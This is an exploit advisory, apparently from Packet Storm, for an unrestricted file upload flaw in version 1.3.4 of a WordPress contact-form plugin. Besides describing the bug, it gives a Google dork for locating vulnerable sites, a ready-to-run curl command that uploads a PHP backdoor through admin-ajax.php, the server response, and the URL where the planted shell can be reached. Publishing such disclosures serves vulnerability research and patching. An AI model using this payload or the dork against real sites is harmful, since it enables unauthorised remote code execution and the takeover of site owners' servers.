WordPress N-Media Website Contact Form with File Upload plugin version 1.3.4 suffers from a remote shell upload vulnerability.
d41218aa3071ffb2db81fe0f6d6cbe3647a9998ddb374231757e89456688781a######################
# Exploit Title : Wordpress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability
# Exploit Author : Claudio Viviani
# Software Link : https://downloads.wordpress.org/plugin/website-contact-form-with-file-upload.1.3.4.zip
# Date : 2015-04-1
# Dork Google: index of website-contact-form-with-file-upload
index of /uploads/contact_files/
# Tested on : Linux BackBox 4.0 / curl 7.35.0
#####################
# Info :
The "upload_file()" ajax function is affected from unrestircted file upload vulnerability.
######################
# PoC:
curl -k -X POST -F "action=upload" -F "Filedata=@./backdoor.php" -F "action=nm_webcontact_upload_file" https://VICTIM/wp-admin/admin-ajax.php
Response: {"status":"uploaded","filename":"1427927588-backdoor.php"}
######################
# Backdoor Location:
https://VICTIM/wp-content/uploads/contact_files/1427927588-backdoor.php
#####################
Discovered By : Claudio Viviani
https://www.homelab.it
https://ffhd.homelab.it (Free Fuzzy Hashes Database)
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed